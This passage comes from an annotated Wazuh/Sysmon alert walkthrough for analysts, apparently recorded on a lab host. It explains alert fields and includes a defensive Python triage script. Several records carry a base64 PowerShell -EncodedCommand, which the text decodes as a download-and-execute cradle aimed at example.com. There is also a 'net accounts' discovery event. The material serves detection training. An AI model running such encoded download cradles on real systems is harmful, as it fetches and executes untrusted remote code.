agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534217.1049378 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event; Sysmon event ID numbering applies.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} Fixed GUID of the Sysmon provider.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones! For Sysmon, 1 = Process Create.
data.win.system.version: 5 Schema version of this Sysmon event type. Only matters if a parser breaks.
data.win.system.level: 4 ETW level; 4 = Informational. Carries no severity signal for Sysmon.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.). For Sysmon it simply mirrors the event ID.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:01.8631189Z Time the event was written to the log. Use eventdata.utcTime to order events.
data.win.system.eventRecordID: 282423 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the Sysmon service that logged the event, not of the process being reported; see data.win.eventdata.processId for that.
data.win.system.threadID: 4740 Thread inside the Sysmon service that wrote the event. Ignore for triage.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the record lives in.
data.win.system.computer: Attacker Hostname as recorded by the event log itself; should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:00.700
ProcessGuid: {94294ddc-bcd0-680a-c60a-000000000e00}
ProcessId: 12264
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcc9-680a-b70a-000000000e00}
ParentProcessId: 2176
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" Last line of the raw Sysmon message. Every field in it is broken out below as data.win.eventdata.*, so query those rather than parsing this text.
data.win.eventdata.utcTime: 2025-04-24 22:36:00.700 Process-creation time in UTC as stamped by Sysmon; about seven seconds after PID 2176 started.
data.win.eventdata.processGuid: {94294ddc-bcd0-680a-c60a-000000000e00} Sysmon's unique ID for this third PowerShell in the chain. The 92213 alert that follows carries the same GUID.
data.win.eventdata.processId: 12264 Windows PID of the new PowerShell. Recyclable; prefer processGuid for joins.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe The 64-bit Windows PowerShell 5.1 host in System32, same path as the parent.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) PE resource version string; same build as the other PowerShell events, as expected.
data.win.eventdata.description: Windows PowerShell PE resource description. Cosmetic; never trust it alone.
data.win.eventdata.product: Microsoft® Windows® Operating System PE resource product name. Same caveat as description.
data.win.eventdata.company: Microsoft Corporation PE resource company name. Confirm with the hash or signature, not this string.
data.win.eventdata.originalFileName: PowerShell.EXE Internal name compiled into the binary; compare with the file name in image to catch renaming.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Full command line; the same base64 payload as the previous 92057 alert, decoding to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'). Seeing it a second time from a child of PID 2176 confirms the relaunch chain rather than a new payload.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ Working directory of the new process: the user's profile root.
data.win.eventdata.user: Attacker\\Attcker1 Account the process runs as; a local account (domain part equals the hostname).
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} Sysmon's logon-session ID; same session as PID 2176.
data.win.eventdata.logonId: 0x26584 Windows logon session ID; same as PID 2176, so no new logon occurred. Match to Security 4624 for the logon details.
data.win.eventdata.terminalSessionId: 1 Interactive desktop session.
data.win.eventdata.integrityLevel: Medium Standard, non-elevated user token; still no escalation.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC Hash of powershell.exe on disk; identical to the earlier events, as expected for the same binary.
data.win.eventdata.parentProcessGuid: {94294ddc-bcc9-680a-b70a-000000000e00} Matches the processGuid of PID 2176 in the preceding 92057 alert. The chain so far is 9592 → 2176 → 12264.
data.win.eventdata.parentProcessId: 2176 PID of the parent at creation time; the PowerShell from the preceding 92057 alert.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Executable of the parent: powershell.exe again, which is what rule 92057 describes.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Parent's command line; identical to the child's, as in the previous hop.
data.win.eventdata.parentUser: Attacker\\Attcker1 Account the parent runs as; same as the child.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 26 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534217.1057445 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event; Sysmon event ID numbering applies.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} Fixed GUID of the Sysmon provider.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones! For Sysmon, 11 = FileCreate.
data.win.system.version: 2 Schema version of this Sysmon event type. Only matters if a parser breaks.
data.win.system.level: 4 ETW level; 4 = Informational. Carries no severity signal for Sysmon.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.). For Sysmon it simply mirrors the event ID.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:02.0618898Z Time the event was written to the log. Use eventdata.utcTime to order events.
data.win.system.eventRecordID: 282424 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the Sysmon service that logged the event, not of the process that wrote the file; see data.win.eventdata.processId for that.
data.win.system.threadID: 4740 Thread inside the Sysmon service that wrote the event. Ignore for triage.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the record lives in.
data.win.system.computer: Attacker Hostname as recorded by the event log itself; should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:02.054
ProcessGuid: {94294ddc-bcd0-680a-c60a-000000000e00}
ProcessId: 12264
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_awmsnad4.ya2.ps1
CreationUtcTime: 2025-04-24 22:36:02.054
User: Attacker\Attcker1" Last line of the raw Sysmon message. Every field in it is broken out below as data.win.eventdata.*, so query those rather than parsing this text.
data.win.eventdata.utcTime: 2025-04-24 22:36:02.054 Time the file was created, in UTC, as stamped by Sysmon.
data.win.eventdata.processGuid: {94294ddc-bcd0-680a-c60a-000000000e00} Sysmon GUID of the writing process. It matches the processGuid of PID 12264 in the preceding 92057 alert.
data.win.eventdata.processId: 12264 PID of the writing process; the third PowerShell in the chain.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Executable that created the file.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_awmsnad4.ya2.ps1 Path of the created file. Same PowerShell startup probe as in the previous 92213 alert, with a fresh random suffix: one per PowerShell host start, so expect one of these for every link in the relaunch chain. Benign noise; the 92057 alert for the writer is the signal.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:02.054 File-system creation timestamp. Equal to utcTime, so the file was new rather than overwritten.
data.win.eventdata.user: Attacker\\Attcker1 Account that wrote the file; same user as the process.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
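Triage logic for the two 92213 alerts above, as an added example: it recognises PowerShell's startup probe file by its name pattern and writer, classifies other writes to staging folders, and checks whether the writer is a process already flagged by an Event ID 1 alert so the file-create alert is treated as context rather than a new lead. This is illustration code written for this page, not Wazuh or Sysmon code. The first sample event is copied from the 92213 alert for PID 2176; the second is constructed (hypothetical path and process GUID) to exercise the other branch.

```python
"""Classify Sysmon Event ID 11 (FileCreate) eventdata records such as the ones
behind Wazuh rule 92213. Added example, not part of Wazuh."""
import re

# PowerShell writes this file at startup to test AppLocker/WDAC script
# enforcement and deletes it immediately; fixed prefix plus a random suffix.
PS_POLICY_PROBE = re.compile(r'(?i)\\AppData\\Local\\Temp\\__PSScriptPolicyTest_[^\\]+\.ps1$')
POWERSHELL_HOSTS = ('powershell.exe', 'pwsh.exe', 'powershell_ise.exe')
# Folders malware commonly stages in (lower-case, backslash-terminated) and
# extensions Windows will execute or script.
STAGING_DIRS = ('\\appdata\\local\\temp\\', '\\appdata\\roaming\\', '\\programdata\\',
                '\\windows\\temp\\', '\\users\\public\\')
EXEC_EXTS = ('.exe', '.dll', '.ps1', '.vbs', '.js', '.bat', '.cmd', '.scr', '.hta')

PAGE_EVENT = {  # copied from alert 1745534217.1046613 on this page
    'processGuid': '{94294ddc-bcc9-680a-b70a-000000000e00}', 'processId': 2176,
    'image': r'C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe',
    'targetFilename': r'C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_24a1orhe.2h5.ps1',
    'user': r'Attacker\Attcker1',
}
CONSTRUCTED_EVENT = {  # hypothetical drop, not from the page
    'processGuid': '{00000000-0000-0000-0000-000000000001}', 'processId': 4242,
    'image': r'C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe',
    'targetFilename': r'C:\Users\Attcker1\AppData\Local\Temp\update.exe',
    'user': r'Attacker\Attcker1',
}
# processGuids from the two 92057 (Event ID 1) alerts on this page.
FLAGGED_GUIDS = {'{94294ddc-bcc9-680a-b70a-000000000e00}',
                 '{94294ddc-bcd0-680a-c60a-000000000e00}'}


def base_name(path):
    return path.lower().rsplit('\\', 1)[-1]


def classify_file_create(ev):
    """Return (verdict, reason) for one Event ID 11 eventdata record."""
    target = ev['targetFilename']
    low = target.lower()
    writer = base_name(ev['image'])
    # Name pattern AND a PowerShell writer: the host's own script-policy probe.
    if PS_POLICY_PROBE.search(target) and writer in POWERSHELL_HOSTS:
        return ('benign-ps-policy-probe',
                'PowerShell startup script-policy test file written by a PowerShell host')
    in_staging = any(d in low for d in STAGING_DIRS)
    if in_staging and low.endswith(EXEC_EXTS):
        return ('review', f'{base_name(target)} written to a staging folder by {writer}')
    return ('info', 'outside the usual staging folders or not an executable type')


def written_by_flagged_process(ev, flagged_guids):
    """True when the writer already has an Event ID 1 alert: this record adds
    context to that alert instead of opening a new lead."""
    return ev['processGuid'] in flagged_guids


if __name__ == '__main__':
    for ev in (PAGE_EVENT, CONSTRUCTED_EVENT):
        verdict, reason = classify_file_create(ev)
        print(ev['processId'], verdict, reason,
              'writer already flagged' if written_by_flagged_process(ev, FLAGGED_GUIDS) else '')
```

The page's event comes back as `benign-ps-policy-probe` written by an already-flagged process, which is the right reading of that alert; the constructed `update.exe` comes back as `review`. The probe check is a name-plus-writer heuristic: a script running inside PowerShell could write a file with that prefix deliberately, so the stronger confirmation is that the genuine probe is deleted within milliseconds of creation. In Wazuh the same exclusion is normally expressed as a child rule of 92213 at level 0 matching win.eventdata.targetFilename and win.eventdata.image.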
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 6 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534218.1060214 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event; Sysmon event ID numbering applies.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} Fixed GUID of the Sysmon provider.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones! For Sysmon, 1 = Process Create. The message below shows net1.exe, the helper that net.exe hands most subcommands to, so the interesting ancestor is one hop above net.exe, not net1.exe itself.
data.win.system.version: 5 Schema version of this Sysmon event type. Only matters if a parser breaks.
data.win.system.level: 4 ETW level; 4 = Informational. Carries no severity signal for Sysmon.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.). For Sysmon it simply mirrors the event ID.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:03.6012258Z Time the event was written to the log. Use eventdata.utcTime to order events.
data.win.system.eventRecordID: 282438 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the Sysmon service that logged the event, not of the process being reported.
data.win.system.threadID: 4740 Thread inside the Sysmon service that wrote the event. Ignore for triage.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the record lives in.
data.win.system.computer: Attacker Hostname as recorded by the event log itself; should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:03.520
ProcessGuid: {94294ddc-bcd3-680a-ca0a-000000000e00}
ProcessId: 13664
Image: C:\Windows\SysWOW64\net1.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net1.exe
CommandLine: C:\WINDOWS\system32\net1 accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
ParentProcessGuid: {94294ddc-bcca-680a-c10a-000000000e00}
ParentProcessId: 2332
ParentImage: C:\Windows\SysWOW64\net.exe
ParentCommandLine: net.exe accounts
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:03.520 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcd3-680a-ca0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13664 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\net1 accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcca-680a-c10a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 2332 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see high-risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 23 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534218.1065269 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:04.4484774Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282461 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:03.117
ProcessGuid: {94294ddc-bcd3-680a-c80a-000000000e00}
ProcessId: 11368
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcd0-680a-c60a-000000000e00}
ParentProcessId: 12264
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:03.117 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcd3-680a-c80a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11368 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcd0-680a-c60a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 12264 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
